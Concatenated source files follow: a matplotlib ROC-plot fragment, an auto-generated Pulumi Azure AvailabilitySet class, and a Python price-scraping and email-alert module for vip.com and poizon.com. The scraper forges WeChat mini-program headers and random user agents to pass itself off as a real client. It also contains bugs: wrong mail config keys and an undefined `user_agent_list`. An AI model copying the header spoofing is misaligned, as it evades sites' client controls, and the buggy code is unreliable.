plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic')
plt.legend(loc="lower right")
plt.savefig('ROC'+str(number_of_features)+'.png',dpi=200)
plt.show()
| [
"noreply@github.com"
] | Luiscn.noreply@github.com |
b3cf3a9f9a3615ad902926a49be6cbf5d61fa253 | 5e6d8b9989247801718dd1f10009f0f7f54c1eb4 | /sdk/python/pulumi_azure_native/compute/availability_set.py | 5b77516e40d5119864dee8097599203fac648887 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | vivimouret29/pulumi-azure-native | d238a8f91688c9bf09d745a7280b9bf2dd6d44e0 | 1cbd988bcb2aa75a83e220cb5abeb805d6484fce | refs/heads/master | 2023-08-26T05:50:40.560691 | 2021-10-21T09:25:07 | 2021-10-21T09:25:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,431 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['AvailabilitySetArgs', 'AvailabilitySet']
@pulumi.input_type
class AvailabilitySetArgs:
    """Input property bag for constructing an ``AvailabilitySet`` resource.

    NOTE: auto-generated code (see the file header) -- the constructor
    signature and the ``@pulumi.getter``/setter pairs below are processed by
    the ``@pulumi.input_type`` decorator, so avoid hand-editing anything
    beyond comments and docstrings.
    """
    def __init__(__self__, *,
                 resource_group_name: pulumi.Input[str],
                 availability_set_name: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 platform_fault_domain_count: Optional[pulumi.Input[int]] = None,
                 platform_update_domain_count: Optional[pulumi.Input[int]] = None,
                 proximity_placement_group: Optional[pulumi.Input['SubResourceArgs']] = None,
                 sku: Optional[pulumi.Input['SkuArgs']] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 virtual_machines: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]] = None):
        """
        The set of arguments for constructing a AvailabilitySet resource.

        :param pulumi.Input[str] resource_group_name: The name of the resource group.
        :param pulumi.Input[str] availability_set_name: The name of the availability set.
        :param pulumi.Input[str] location: Resource location
        :param pulumi.Input[int] platform_fault_domain_count: Fault Domain count.
        :param pulumi.Input[int] platform_update_domain_count: Update Domain count.
        :param pulumi.Input['SubResourceArgs'] proximity_placement_group: Specifies information about the proximity placement group that the availability set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
        :param pulumi.Input['SkuArgs'] sku: Sku of the availability set, only name is required to be set. See AvailabilitySetSkuTypes for possible set of values. Use 'Aligned' for virtual machines with managed disks and 'Classic' for virtual machines with unmanaged disks. Default value is 'Classic'.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
        :param pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]] virtual_machines: A list of references to all virtual machines in the availability set.
        """
        # ``resource_group_name`` is the only required argument; every other
        # argument is optional and is only recorded on the instance when the
        # caller supplied a non-None value.
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        if availability_set_name is not None:
            pulumi.set(__self__, "availability_set_name", availability_set_name)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if platform_fault_domain_count is not None:
            pulumi.set(__self__, "platform_fault_domain_count", platform_fault_domain_count)
        if platform_update_domain_count is not None:
            pulumi.set(__self__, "platform_update_domain_count", platform_update_domain_count)
        if proximity_placement_group is not None:
            pulumi.set(__self__, "proximity_placement_group", proximity_placement_group)
        if sku is not None:
            pulumi.set(__self__, "sku", sku)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if virtual_machines is not None:
            pulumi.set(__self__, "virtual_machines", virtual_machines)

    # Each property pair below exposes a snake_case Python accessor whose
    # value is stored/retrieved via ``pulumi.set``/``pulumi.get``; where the
    # wire name differs it is supplied through ``@pulumi.getter(name=...)``
    # (e.g. "resourceGroupName").
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="availabilitySetName")
    def availability_set_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the availability set.
        """
        return pulumi.get(self, "availability_set_name")

    @availability_set_name.setter
    def availability_set_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "availability_set_name", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Resource location
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter(name="platformFaultDomainCount")
    def platform_fault_domain_count(self) -> Optional[pulumi.Input[int]]:
        """
        Fault Domain count.
        """
        return pulumi.get(self, "platform_fault_domain_count")

    @platform_fault_domain_count.setter
    def platform_fault_domain_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "platform_fault_domain_count", value)

    @property
    @pulumi.getter(name="platformUpdateDomainCount")
    def platform_update_domain_count(self) -> Optional[pulumi.Input[int]]:
        """
        Update Domain count.
        """
        return pulumi.get(self, "platform_update_domain_count")

    @platform_update_domain_count.setter
    def platform_update_domain_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "platform_update_domain_count", value)

    @property
    @pulumi.getter(name="proximityPlacementGroup")
    def proximity_placement_group(self) -> Optional[pulumi.Input['SubResourceArgs']]:
        """
        Specifies information about the proximity placement group that the availability set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
        """
        return pulumi.get(self, "proximity_placement_group")

    @proximity_placement_group.setter
    def proximity_placement_group(self, value: Optional[pulumi.Input['SubResourceArgs']]):
        pulumi.set(self, "proximity_placement_group", value)

    @property
    @pulumi.getter
    def sku(self) -> Optional[pulumi.Input['SkuArgs']]:
        """
        Sku of the availability set, only name is required to be set. See AvailabilitySetSkuTypes for possible set of values. Use 'Aligned' for virtual machines with managed disks and 'Classic' for virtual machines with unmanaged disks. Default value is 'Classic'.
        """
        return pulumi.get(self, "sku")

    @sku.setter
    def sku(self, value: Optional[pulumi.Input['SkuArgs']]):
        pulumi.set(self, "sku", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Resource tags
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="virtualMachines")
    def virtual_machines(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]:
        """
        A list of references to all virtual machines in the availability set.
        """
        return pulumi.get(self, "virtual_machines")

    @virtual_machines.setter
    def virtual_machines(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SubResourceArgs']]]]):
        pulumi.set(self, "virtual_machines", value)
class AvailabilitySet(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 availability_set_name: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 platform_fault_domain_count: Optional[pulumi.Input[int]] = None,
                 platform_update_domain_count: Optional[pulumi.Input[int]] = None,
                 proximity_placement_group: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 virtual_machines: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
                 __props__=None):
        """
        Specifies information about the availability set that the virtual machine should be assigned to. Virtual machines specified in the same availability set are allocated to different nodes to maximize availability. For more information about availability sets, see [Manage the availability of virtual machines](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-manage-availability?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json). <br><br> For more information on Azure planned maintenance, see [Planned maintenance for virtual machines in Azure](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-planned-maintenance?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json) <br><br> Currently, a VM can only be added to availability set at creation time. An existing VM cannot be added to an availability set.
        API Version: 2020-12-01.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] availability_set_name: The name of the availability set.
        :param pulumi.Input[str] location: Resource location
        :param pulumi.Input[int] platform_fault_domain_count: Fault Domain count.
        :param pulumi.Input[int] platform_update_domain_count: Update Domain count.
        :param pulumi.Input[pulumi.InputType['SubResourceArgs']] proximity_placement_group: Specifies information about the proximity placement group that the availability set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
        :param pulumi.Input[str] resource_group_name: The name of the resource group.
        :param pulumi.Input[pulumi.InputType['SkuArgs']] sku: Sku of the availability set, only name is required to be set. See AvailabilitySetSkuTypes for possible set of values. Use 'Aligned' for virtual machines with managed disks and 'Classic' for virtual machines with unmanaged disks. Default value is 'Classic'.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]] virtual_machines: A list of references to all virtual machines in the availability set.
        """
        # Typing-only overload: plain keyword-argument calling form.  The
        # shared implementation lives in ``_internal_init``.
        ...
@overload
def __init__(__self__,
resource_name: str,
args: AvailabilitySetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Specifies information about the availability set that the virtual machine should be assigned to. Virtual machines specified in the same availability set are allocated to different nodes to maximize availability. For more information about availability sets, see [Manage the availability of virtual machines](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-manage-availability?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json). <br><br> For more information on Azure planned maintenance, see [Planned maintenance for virtual machines in Azure](https://docs.microsoft.com/azure/virtual-machines/virtual-machines-windows-planned-maintenance?toc=%2fazure%2fvirtual-machines%2fwindows%2ftoc.json) <br><br> Currently, a VM can only be added to availability set at creation time. An existing VM cannot be added to an availability set.
API Version: 2020-12-01.
:param str resource_name: The name of the resource.
:param AvailabilitySetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AvailabilitySetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       availability_set_name: Optional[pulumi.Input[str]] = None,
                       location: Optional[pulumi.Input[str]] = None,
                       platform_fault_domain_count: Optional[pulumi.Input[int]] = None,
                       platform_update_domain_count: Optional[pulumi.Input[int]] = None,
                       proximity_placement_group: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
                       tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                       virtual_machines: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SubResourceArgs']]]]] = None,
                       __props__=None):
        """Shared implementation behind both ``__init__`` overloads.

        Validates options, builds the property bag, registers legacy type
        aliases, and hands off to the Pulumi resource base class.
        ``__props__`` is only valid together with ``opts.id`` (lookup of an
        existing resource).
        """
        # Normalize options: default, type-check, and pin the plugin version.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the property bag from the
            # individual keyword arguments.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = AvailabilitySetArgs.__new__(AvailabilitySetArgs)

            __props__.__dict__["availability_set_name"] = availability_set_name
            __props__.__dict__["location"] = location
            __props__.__dict__["platform_fault_domain_count"] = platform_fault_domain_count
            __props__.__dict__["platform_update_domain_count"] = platform_update_domain_count
            __props__.__dict__["proximity_placement_group"] = proximity_placement_group
            # resource_group_name is required unless looking up by URN.
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["sku"] = sku
            __props__.__dict__["tags"] = tags
            __props__.__dict__["virtual_machines"] = virtual_machines
            # Output-only properties, populated by the provider after creation.
            __props__.__dict__["name"] = None
            __props__.__dict__["statuses"] = None
            __props__.__dict__["type"] = None
        # Register aliases so states created under older package names /
        # API-versioned types still resolve to this resource.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20150615:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20150615:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20160330:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20160330:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20160430preview:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20160430preview:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20170330:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20170330:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20171201:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20171201:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20180401:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20180401:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20180601:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20180601:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20181001:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20181001:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20190301:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20190301:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20190701:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20190701:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20191201:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20191201:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20200601:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20200601:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20201201:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20201201:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20210301:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20210301:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20210401:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20210401:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-native:compute/v20210701:AvailabilitySet"),
                                                     pulumi.Alias(type_="azure-nextgen:compute/v20210701:AvailabilitySet")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        # Register the resource with the Pulumi engine under its canonical type token.
        super(AvailabilitySet, __self__).__init__(
            'azure-native:compute:AvailabilitySet',
            resource_name,
            __props__,
            opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'AvailabilitySet':
"""
Get an existing AvailabilitySet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = AvailabilitySetArgs.__new__(AvailabilitySetArgs)
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["platform_fault_domain_count"] = None
__props__.__dict__["platform_update_domain_count"] = None
__props__.__dict__["proximity_placement_group"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["statuses"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["virtual_machines"] = None
return AvailabilitySet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="platformFaultDomainCount")
def platform_fault_domain_count(self) -> pulumi.Output[Optional[int]]:
"""
Fault Domain count.
"""
return pulumi.get(self, "platform_fault_domain_count")
@property
@pulumi.getter(name="platformUpdateDomainCount")
def platform_update_domain_count(self) -> pulumi.Output[Optional[int]]:
"""
Update Domain count.
"""
return pulumi.get(self, "platform_update_domain_count")
@property
@pulumi.getter(name="proximityPlacementGroup")
def proximity_placement_group(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]:
"""
Specifies information about the proximity placement group that the availability set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
"""
return pulumi.get(self, "proximity_placement_group")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.SkuResponse']]:
"""
Sku of the availability set, only name is required to be set. See AvailabilitySetSkuTypes for possible set of values. Use 'Aligned' for virtual machines with managed disks and 'Classic' for virtual machines with unmanaged disks. Default value is 'Classic'.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def statuses(self) -> pulumi.Output[Sequence['outputs.InstanceViewStatusResponse']]:
"""
The resource status information.
"""
return pulumi.get(self, "statuses")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualMachines")
def virtual_machines(self) -> pulumi.Output[Optional[Sequence['outputs.SubResourceResponse']]]:
"""
A list of references to all virtual machines in the availability set.
"""
return pulumi.get(self, "virtual_machines")
| [
"noreply@github.com"
] | vivimouret29.noreply@github.com |
155b52bb1a9e4aa73afd62fa8af025b4d0842a30 | 5df42e7af528a6d56639c9359459fb58f07d0626 | /wolf_outer/spider_bases/utils.py | 965dce98bbae90ca92d25a7aee0fe0a17896b64f | [] | no_license | nwaiting/wolf-ai | 63487fc7dd297f6b0fb6116788db369f2ea7ff2e | 6ec93de254f081b41fec86078ac1fc9122cbddd5 | refs/heads/master | 2021-06-09T00:26:06.698516 | 2021-03-30T01:13:45 | 2021-03-30T01:13:45 | 86,796,641 | 7 | 10 | null | null | null | null | UTF-8 | Python | false | false | 58,694 | py | import threading
import logging
import datetime
import time
import smtplib
from email.mime.text import MIMEText
from email.header import Header
import json
import requests
import random
import hashlib
from .config import mobile_user_agents
from .sqlmodel import SqlModel
logger = logging.getLogger(__file__)
def to_int(v, default=0):
try:
return int(v)
except:
return default
def to_float(v, default=0.0):
try:
return float(v)
except:
return default
class SendMail(object):
@staticmethod
def send(mail_configs, text):
_mail_content_type = mail_configs["mail_type"]
_mail_header_from = mail_configs["GoodsInfoJd"]
_mail_header_to = mail_configs["GoodsInfoJd"]
_mail_header_subject = mail_configs["GoodsInfoJd"]
_mail_host = mail_configs["mail_host"]
_mail_pwd = mail_configs["mail_pwd"]
_mail_sender = mail_configs["mail_sender"]
_mail_receivers = mail_configs["mail_receivers"]
message = MIMEText(text, _mail_content_type, 'utf-8')
message['From'] = Header(_mail_header_from, 'utf-8')
message['To'] = Header(_mail_header_to, 'utf-8')
message['Subject'] = Header(_mail_header_subject, 'utf-8')
try:
smtpObj = smtplib.SMTP_SSL(_mail_host, 465)
smtpObj.login(_mail_sender, _mail_pwd)
smtpObj.sendmail(_mail_sender, _mail_receivers, message.as_string())
smtpObj.quit()
except smtplib.SMTPException as e:
logger.error('send {} mail error {}'.format(_mail_receivers, e))
else:
logger.info("send {} email success".format(_mail_receivers))
class MailNotify(threading.Thread):
def __init__(self, _dbhost, _dbport, _dbuser, _dbpwd, _db, _mail_host, _mail_pass,
_sender, _receivers, _params, _sleep=30):
self.dbhost = _dbhost
self.dbport = _dbport
self.dbuser = _dbuser
self.dbpwd = _dbpwd
self.db = _db
self.mail_host = _mail_host
self.mail_pass = _mail_pass
self.sender = _sender
self.receivers = _receivers
self.params = _params
self.last_list = set()
self.lowprice_last_list = set()
self.last_discount_list = set()
self.sleep = _sleep
self.sql = SqlModel(_dbhost, _dbport, _dbuser, _dbpwd, _db)
super(MailNotify, self).__init__()
def get_mail_config(self):
return {}
def send(self, send_list, header=None):
send_str_list = []
for it in send_list:
tmp_str = """<p>name: {},id: {} delta:{},price:{}/{}({}),du:{}/{},extern:{},new:{},sold:{} <a href={}>{}</a>
<a href={}>(详情)</a></p>""".format(it['source'],it['good_id'],it['delta'],
it['price'],it['marketPrice'],it['saleDiscount'],
it['du_price'],it['du_count'],it['source_extern'],
it.get('new', 0),
it['sold_items'],it['pic'],it['title'],it['detail'])
send_str_list.append(tmp_str)
if header:
contents = "<h3>{}</h3>".format(header) + ''.join(send_str_list)
else:
contents = ''.join(send_str_list)
SendMail.send(self.get_mail_config(), contents)
def get_list(self, price_delta, count_delta, limit=0, size=50):
now_day = datetime.datetime.now().strftime('%Y-%m-%d')
sql = 'select title,good_id,saleDiscount,detail,pic,price,du_price,marketPrice,du_count,source_extern,' \
'`source`,extern,sold_items,updated_date,updated_day from tb_goods ' \
'where du_price-price>=%s and du_count>%s and updated_day=%s order by updated_ts desc limit %s,%s'
res = self.sql.execute(sql, [price_delta, count_delta, now_day, limit, size])
for d in res:
d['delta'] = d['du_price'] - d['price']
return res
def get_discount_list(self, max_discount, min_marketPrice, limit=0, size=50):
now_day = datetime.datetime.now().strftime('%Y-%m-%d')
sql = 'select title,good_id,saleDiscount,discount,detail,pic,price,du_price,marketPrice,du_count,source_extern,' \
'`source`,extern,sold_items,updated_date,updated_day from tb_goods ' \
'where discount<%s and marketPrice>%s and updated_day=%s order by updated_ts desc limit %s,%s'
res = self.sql.execute(sql, [max_discount, min_marketPrice, now_day, limit, size])
for d in res:
d['delta'] = d['du_price'] - d['price']
res.sort(key=lambda x:x['discount'], reverse=False)
return res
def run(self):
logger.info("start thread {}".format(self.__class__))
now_day = datetime.datetime.now().strftime("%Y-%m-%d")
while True:
res = self.get_list(self.params.get('delta', 50), self.params.get('delta_count', 500), size=200)
is_send = False
for it in res:
tmp_key = "{}_{}".format(it['good_id'], it['price'])
if tmp_key not in self.last_list:
self.last_list.add(tmp_key)
it['new'] = 1
is_send = True
if is_send:
res.sort(key=lambda x: (x.get('new', 0), x['delta']), reverse=True)
self.send(res[:100])
res = self.get_list(self.params.get('lowprice_delta', 200), self.params.get('lowprice_delta_count', 50), size=200)
is_send = False
for it in res:
tmp_key = "{}_{}".format(it['good_id'], it['price'])
if tmp_key not in self.lowprice_last_list:
self.lowprice_last_list.add(tmp_key)
it['new'] = 1
is_send = True
if is_send:
res.sort(key=lambda x: (x.get('new', 0), x['delta']), reverse=True)
self.send(res[:100], 'lowprice')
# res = self.get_discount_list(self.params.get('discount', 3), self.params.get('discount_count', 500))
# is_send = False
# for it in res:
# tmp_key = "{}_{}".format(it['good_id'], it['price'])
# if tmp_key not in self.last_discount_list:
# self.last_discount_list.add(tmp_key)
# it['new'] = 1
# is_send = True
# if is_send:
# self.send(res, 'discount')
time.sleep(self.sleep)
if now_day != datetime.datetime.now().strftime("%Y-%m-%d"):
self.last_list = set()
self.lowprice_last_list = set()
now_day = datetime.datetime.now().strftime("%Y-%m-%d")
class GoodDetailGet(threading.Thread):
def __init__(self, task_q, result_q, sleep=4):
self.task_queue = task_q
self.result_queue = result_q
self.sleep =sleep
super(GoodDetailGet, self).__init__()
def get_headers(self):
return {
"user-agent": random.choice(mobile_user_agents),
"referer": "https://list.vip.com/"
}
def get_sold_detail(self, productId):
url = 'https://stock.vip.com/detail/'
params = {
"callback": "stock_detail",
"merchandiseId": productId,
"is_old": "0",
"areaId": "103101",
"_": "{}".format(int(time.time() * 1000))
}
r = []
try:
res = requests.get(url, headers=self.get_headers(), params=params, timeout=5)
contents = res.text.replace("stock_detail(", '').strip('\r\n ')[:-1]
c2 = json.loads(contents)
for it in c2['items']:
if int(it.get('stock', 0)) > 0:
r.append({
it['name']: it['stock']
})
return json.dumps(r)
except Exception as e:
logger.error("get_sold_detail {}={}={}".format(url, productId, e))
return json.dumps(r)
def get_detail(self, productId, api_key='70f71280d5d547b2a7bb370a529aeea1'):
url = 'https://mapi.vip.com/vips-mobile/rest/shopping/pc/product/detail/v5'
params = {
"callback": "detailInfoCB",
"app_name": "shop_pc",
"app_version": "4.0",
"warehouse": "VIP_SH",
"fdc_area_id": "103101101",
"client": "pc",
"mobile_platform": "1",
"province_id": "103101",
"api_key": "{}".format(api_key),
"user_id": "",
"mars_cid": "1604906927034_08fa7a00d3c9cd0288978fe43e69bb46",
"wap_consumer": "a",
"productId": "{}".format(productId),
"functions": "brand_store_info,newBrandLogo,hideOnlySize,extraDetailImages,sku_price,ui_settings",
"kfVersion": "1",
"highlightBgImgVer": "1",
"is_get_TUV": "1",
"commitmentVer": "2",
"haitao_description_fields": "text",
"supportSquare": "1",
"longTitleVer": "2",
"propsVer": "1"
}
try:
res = requests.get(url, headers=self.get_headers(), params=params, timeout=5)
contents = res.text.replace('detailInfoCB(', '').strip('\r\n ')[:-1]
c = json.loads(contents)
return c['data']['product']['merchandiseSn']
except Exception as e:
logger.error("get_detail {}={}={}".format(url, productId, e))
return ''
def run(self):
logger.info("start thread {}".format(self.__class__))
statistic_count = 0
while True:
if self.task_queue.empty():
time.sleep(1)
continue
items = self.task_queue.get()
db_id, product_id = items[0], items[1]
good_id = self.get_detail(product_id)
sold_items = self.get_sold_detail(product_id)
self.result_queue.put((db_id, good_id, sold_items))
statistic_count += 1
if statistic_count % 100 == 0:
logger.info("{} done {}, current {}:{}".format(self.__class__, statistic_count,
self.task_queue.qsize(), self.result_queue.qsize()))
time.sleep(random.uniform(0, self.sleep))
class DuGet(threading.Thread):
def __init__(self, task_q, results_q, sleep=4):
self.task_queue = task_q
self.results_queue = results_q
self.sleep = sleep
self.headers = {
'Host': "app.poizon.com",
'User-Agent': "{} MicroMessenger/7.0.4.501 NetType/WIFI MiniProgramEnv/Windows WindowsWechat".format(random.choice(user_agent_list)),
'appid': "wxapp",
'appversion': "4.4.0",
'content-type': "application/json",
'Accept-Encoding': "gzip, deflate, br",
'Accept': "*/*",
}
index_load_more_url = 'https://app.poizon.com/api/v1/h5/index/fire/index'
# {"sign":"5e22051c5156608a85b12d501d615c61","tabId":"","limit":20,"lastId":1}
recensales_load_more_url = 'https://app.poizon.com/api/v1/h5/commodity/fire/last-sold-list'
# {"sign":"f44e26eb08becbd16b7ed268d83b3b8c","spuId":"73803","limit":20,"lastId":"","sourceApp":"app"}
product_detail_url = 'https://app.poizon.com/api/v1/h5/index/fire/flow/product/detail'
# {"sign":"5721d19afd7a7891b627abb9ac385ab0","spuId":"49413","productSourceName":"","propertyValueId":"0"}
category = {"code":200,"msg":"success","data":{"list":[{"catId":0,"catName":"品牌"},{"catId":1,"catName":"系列"},{"catId":3,"catName":"球鞋"},{"catId":6,"catName":"潮搭"},{"catId":8,"catName":"手表"},{"catId":1000119,"catName":"配件"},{"catId":7,"catName":"潮玩"},{"catId":9,"catName":"数码"},{"catId":1000008,"catName":"家电"},{"catId":726,"catName":"箱包"},{"catId":587,"catName":"美妆"},{"catId":945,"catName":"家居"}]},"status":200}
